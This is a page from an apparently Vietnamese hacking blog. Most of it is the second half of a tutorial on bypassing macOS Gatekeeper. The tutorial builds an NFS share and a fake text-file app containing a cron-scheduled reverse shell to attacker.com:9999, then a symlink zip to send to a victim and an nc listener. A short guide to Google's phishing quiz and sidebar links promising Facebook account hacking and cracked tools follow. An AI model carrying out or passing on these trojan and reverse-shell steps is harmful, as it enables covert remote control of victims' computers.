  keyutils libevent-2.0-5 libnfsidmap2 libtirpc1 nfs-common nfs-kernel-server rpcbind
0 upgraded, 7 newly installed, 0 to remove and 58 not upgraded.
Need to get 718 kB of archives.
After this operation, 2,037 kB of additional disk space will be used.
Do you want to continue? [Y/n]

Sau khi cài xong thì NFS sẽ được khởi động, bạn cũng có thể check bằng lệnh sau:

~$ sudo systemctl status nfs-server

● nfs-server.service - NFS server and services
   Loaded: loaded (/lib/systemd/system/nfs-server.service; enabled; vendor preset: enabled)
   Active: active (exited) since Sun 2019-05-26 22:16:48 UTC; 33s ago
 Main PID: 14386 (code=exited, status=0/SUCCESS)

May 26 22:16:48 deb1 systemd[1]: Starting NFS server and services...
May 26 22:16:48 deb1 systemd[1]: Started NFS server and services.

Mình sẽ tạo một folder mới để chứa file payload.app.

~$ sudo mkdir -p /nfs/monthly

Folder này sẽ được chia sẻ để máy tính nạn nhân dễ dàng truy cập được từ xa.

~$ sudo echo '/nfs/monthly *(insecure,rw,no_root_squash,anonuid=1000,anongid=1000,async,nohide)' >> /etc/exports

Khởi động lại NFS server

~$ sudo systemctl restart nfs-server

Bạn cũng có thể kiểm tra xem folder đã được chia sẻ chưa bằng cách gõ lệnh sau. Nếu kết quả hiện như dưới là đã thành công.

~$ showmount -e <vps ip address>

Export list for <vps ip address>:
/nfs/monthly *

Bước 2: Tạo file payload.app

Để tạo được payload này thì bạn cần sử dụng một Macbook, mở Terminal lên và gõ như sau để chuyển sang superuser:

~$ sudo su

Đặt biến $app để tiện theo dõi và sử dụng làm tên của file text chúng ta sẽ fake.

~# app='payload_name'

Sao chép game cờ vào folder /tmp . Trong bài viết của tác giả thì tác giả có sử dụng với ứng dụng Calculator tuy nhiên không hiểu vì lí do gì mình không chạy được trên máy mình, thay vào đó mình sử dụng game Chess.

~# cp -r /Applications/Chess.app/ /tmp/"$app".app

Giờ là lúc bạn copy các payload vào file:

~# printf '#!/bin/bash\n%s' "echo '* * * * *     bash -i >&amp; /dev/tcp/attacker.com/9999 0>&amp;1' | crontab -" >/tmp/"$app".app/Contents/MacOS/Chess

Lệnh printf sẽ dẫn (|) một Bash one-liner vào lệnh crontab. Bash one-liner sẽ được lên lịch để thực hiện kết nối TCP mỗi 60 giây một lần tới cổng 9999 của attacker.com

Chmod để app có quyền chạy.

~# chmod +x /tmp/"$app".app/Contents/MacOS/Chess

Thay icon cho ứng dụng Chess bằng lệnh bên dưới. Bạn có thể thay bất cứ icon nào miễn là nó có đuôi .icns

~# cp /path/to/text_file.icns /tmp/"$app".app/Contents/Resources/Chess.icns

Tiến hành nén file payload lại thành một file ZIP

~# zip -ry /tmp/"$app".zip /tmp/"$app".app/

Sau khi nén file xong thì mình sẽ tiến hành copy file vừa nén lên VPS được tạo ở trên. ( Giả sử IP của VPS là 11.22.33.44)

~# scp -P 22 /tmp/"$app".zip 11.22.33.44:/nfs/monthly

root@attacker.com's password:
May.zip                                               100% 4007KB 284.6KB/s   00:14

Lúc này bạn có thể thấy file May.zip trên VPS

~$ ls -la /nfs/monthly/

total 4016
drwxr-xr-x 2 root root    4096 May 26 22:38 .
drwxr-xr-x 3 root root    4096 May 26 22:17 ..
-rw-r--r-- 1 root root 4103220 May 26 22:39 May.zip

Bây giờ truy cập vào folder /nfs/monthly và tiến hành giải nén file May.zip vừa được upload lên

/nfs/monthly# unzip May.zip

Archive:  May.zip
   creating: tmp/May.app/
   creating: tmp/May.app/Contents/
   creating: tmp/May.app/Contents/_CodeSignature/
  inflating: tmp/May.app/Contents/_CodeSignature/CodeResources
   creating: tmp/May.app/Contents/MacOS/
  inflating: tmp/May.app/Contents/MacOS/Chess
   creating: tmp/May.app/Contents/Resources/
...
  inflating: tmp/May.app/Contents/Resources/ca.lproj/InfoPlist.strings
  inflating: tmp/May.app/Contents/Resources/ca.lproj/COPYING
  inflating: tmp/May.app/Contents/Resources/ca.lproj/About.strings
  inflating: tmp/May.app/Contents/Resources/ca.lproj/Board.strings
  inflating: tmp/May.app/Contents/Resources/Game.icns
  inflating: tmp/May.app/Contents/Info.plist
 extracting: tmp/May.app/Contents/PkgInfo
  inflating: tmp/May.app/Contents/version.plist

Chuyển file May.app về folder bạn đang làm việc

/nfs/monthly# mv tmp/May.app/ .

Tiến hành xóa các file, folder không còn cần thiết

/nfs/monthly# rm -rf tmp/ &amp;&amp; rm May.zip

Lúc này trong $app.app chỉ còn lại file May.app

/nfs/monthly# ls -la

total 12
drwxr-xr-x 3 root root 4096 May 26 22:53 .
drwxr-xr-x 3 root root 4096 May 26 22:17 ..
drwxr-xr-x 3 root root 4096 May 26 22:23 May.app

Bước 3 : Tạo file exploit.zip

File exploit.zip như mình đã nói ở trên, sẽ chứa symlink gọi tới NSF share server vừa được setup ở trên. Gõ lệnh sau trên máy Macbook:

~$ mkdir monthly

Tạo một symlink tên invoices trong folder monthly

~$ ln -s /net/attacker.com/nfs/monthly monthly/invoices

Nén những gì vừa được tạo ra thành file exploit.zip . Đây là file sẽ được gửi cho user.

~$ zip -r -y archive.zip monthly

Lưu ý :

  • -r sẽ giúp bạn nén đệ quy hết tất cả các file trong các folder
  • -y sẽ giúp bạn giữ cấu trúc của symlink khi giải nén

Bước 4 : Gửi file exploit.zip cho nạn nhân

Sau khi gửi xong, tất cả những gì bạn cần làm là đợi user mở file May.app.

Ở VPS bạn gõ lệnh sau để lắng nghe các kết nối tới port 9999

nc -l -p 9999

Chúc bạn thành công <3

Lưu ý : Bài viết mang tính chất tham khảo, không áp dụng với mục đích phá hoại. Bạn phải chịu mọi trách nhiệm về những gì bạn làm.

Nguồn : https://null-byte.wonderhowto.com/how-to/bypass-gatekeeper-exploit-macos-v10-14-5-earlier-0198089/

Video của tác giả : https://ouo.io/gxjB8vS

loading...

Tự kiểm tra khả năng chống kĩ thuật hack phising bằng bài test của Google

0

Phishing là hình thức lừa đảo bằng địa chỉ Website giả mạo, dẫn dụ bạn đăng nhập để đánh cắp tài khoản. Hacker thường sử dụng phương pháp Social Engineering để nạn nhân tự cung cấp mật khẩu. Bạn có tự tin về kiến thức nhận dạng phương pháp Phishing? Hãy thử làm bài kiểm tra kiến thức Phishing bằng bài Test của Google. Bạn sẽ hoàn thành 8 câu trắc nghiệm với bài Lab cụ thể để nhận dạng các hình thức Phishing phổ biến.

Nhận dạng các hình thức Phishing

Ngày nay, các đối tượng Hack Facebook cũng thường dùng Phishing để đánh cắp số lượng lớn tài khoản. Cụ thể là sau khi Hack được 1 tài khoản, Hacker sẽ dùng tài khoản đó để đăng những link kêu gọi xem phim 18+. Nếu muốn vào xem bạn phải đăng nhập Facebook, đây chính là link Phishing.

Một hình thức Phishing Facebook

Bên cạnh đó, các Hacker thường Phishing bằng cách gửi Email kèm theo các đường dẫn giả mạo. Qua các bài kiểm tra kiến thức Phishing của Google dưới đây bạn sẽ có cái nhìn trực quan hơn về các thủ đoạn Phishing hiện nay.

Kiểm tra kiến thức Phishing bằng bài Test của Google.

Trước tiên, bạn cần vào trang làm bài Test kiến thức Phishing của Google. Click Take a Quiz và điền thông tin để bắt đầu bài Test.

Cách làm là bạn sẽ chọn đáp án hình bên dưới là PHISHING hay LEGITIMATE. Sau khi chọn xong, Google sẽ cho biết bạ chọn đã chọn đúng hay sai.

  • Nếu đúng sẽ có thông báo: Correct!
  • Nếu sai sẽ có thông báo: This is actually a phishing email.

Và dòng phía bên dưới sẽ diễn giải lý do cho bạn biết vì sao kết quả như vậy. Tiếp tục click vào nút SHOW ME để Google hướng dẫn bạn từng bước nhận diện đó là Phishing.

Sau khi hoàn thành 8 câu, bạn sẽ thấy số điểm của mình được hiện lên. Tiếp tục truy cập vào Link bảo mật tài khoản Google để hoàn tất cả thủ tục bảo mật cho tài khoản của bạn.

Đáp án bài Test Phishing Google

Dưới đây là diễn giải các đáp án của bài kiểm tra kiến thức Phishing Google. Bạn có thể tham khảo:

Câu 1: Rê chuột vào Open in Docs, bạn sẽ thấy link đến Website http://drive-google.com. Đây không phải là Website của Google. Đây là Email Phishing.

Câu 2: Bạn nhận được Email từ Efaxs.com nhưng link đến Website http://efax.hosting.com.mailru382.co/efaxdelivery/2017Dk4h325RE3. Đây Link Phishing, vì domain chính là: mailru382.co còn efax.hosting.com chỉ là Subdomain.

Câu 3: Rê chuột vào THIS PHOTO sẽ thấy link đến https://drive.google.com.download-photo.sytez.net/AONh1e0hVP. Thoạt nhìn thấy có đường dẫn drive.google.com là của Google, nhưng đây chỉ SubDomain của Domain chính sytez.net. Đây là link Phishing.

Câu 4: Người gửi là no-reply@dropboxmail.comrê chuột vào Upgrade your Dropbox thấy link đến https://dropbox.comĐây là địa chỉ đúng của hãng Dropbox, còn email @dropboxmail.com thuộc sở hữu của hãng Dropbox. Đây là link an toàn. Xem thêm : Desktop Phising là gì

Câu 5: Các file PDF có thể chứa phần mềm độc hại hoặc virus. Luôn chắc chắn rằng bạn tin tưởng người gửi và sử dụng trình duyệt của bạn hoặc một dịch vụ trực tuyến như Google Drive để mở chúng một cách an toàn.

Câu 6: Rê chuột vào CHANGE PASSWORD, sẽ thấy link tới http://myaccount.google.com-securitysettingpage.ml-security.org/signonoptions/. Domain chính là ml-security.org không phải của Google. Đây là link Phishing.

Câu 7: Rê chuột vào CHANGE PASSWORD, sẽ thấy link tới https://google.com/amp/tinyurl.com/y7u8ewlr. Domain chính là tinyurl.comkhông phải của Google. Email người gửi là no-reply@google.support, Google không có domain google.support. Đây là link Phishing.

Câu 8: Đây là các Application được Google cấp quyền để truy cập vào tài khoản của bạn. Hãy cân nhắc khi cấp quyền tài khoản cho một Website nào đó. Tuy nhiên việc này là hợp lệ. Đây là Link hợp lệ

Hy vọng với bài kiểm tra kiến thức Phishing bạn sẽ có thêm kinh nghiệm để phòng tránh bị Hack tài khoản.


loading...
cách hack nick facebook của người khác

Cách hack nick facebook bằng điện thoại

50
Facebook là mạng xã hội được cộng đồng mạng sử dụng nhiều nhất hiện nay. Dưới đây chúng tôi sẽ hướng dẫn bạn đọc...

Hướng dẫn đọc trộm tin nhắn facebook qua token

80
Trong bài viết này AD sẽ hướng dẫn các bạn đọc trộm tin nhắn facebook của người khác mà không cần biết email, mật...

Chia Sẻ Tool ATP của ATP Software Cracked

198
Cập nhật ngày : 25/10 : Đã fix lại link AD chia sẻ lại bộ Tool ATP của ATP Software đã được crack thành công cho mọi...

Làm thế nào để trở thành Hacker ( Part 7) – hackerrank

2
PART 7 hackerrank 42 . ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 : _ WircSrv IRC là một Server IRC thông dụng trên...

Hướng dẫn hack pass Wifi WPA/WPA2-PSK

26
Mặc dù trên mạng có rất nhiều công cụ và hướng dẫn cách hack wifi WPA/WPA2 - PSK, thậm chí có cả cách hack...

Hướng dẫn mở nick facebook bị report

9
CÁCH mở nick facebook bị report 1/nên xài cmnd thật . kháng nghị xong vô mail reply theo mẫu 13t và 14t —————————————————————————————– Hi Team Facebook. Please check...

Hack nick facebook bằng trang web giả- phising page

10
Phishing là gì ? Tìm hiểu phương thức Phishing ! Phishing phương thức tạo ra những trang web giả một cách tinh vi để dụ dỗ những người...
cách lấy lại tài khoản facebook bị mất

Cách lấy lại tài khoản facebook bị mất

2
Lấy lại tài khoản facebook  - Các bạn biết đấy Facebook là mạng xã hội lớn nhất hiện nay với số lượng người dùng...

Cấu Trúc If … Else Trong Ngôn Ngữ C++

3
Cấu trúc c++: giới thiệu   Trong quá trình viết các chương trình, bài toán của chúng ta thường xuất hiện các trường hợp khác nhau...

Hack nick facebook người khác trong 2 phút [ 2017 ]

21
Giới thiệu kĩ thuật hack nick facebook : Trong bài viết này mình sẽ giới thiệu cho các bạn một cách hack nick facebook người khác trong...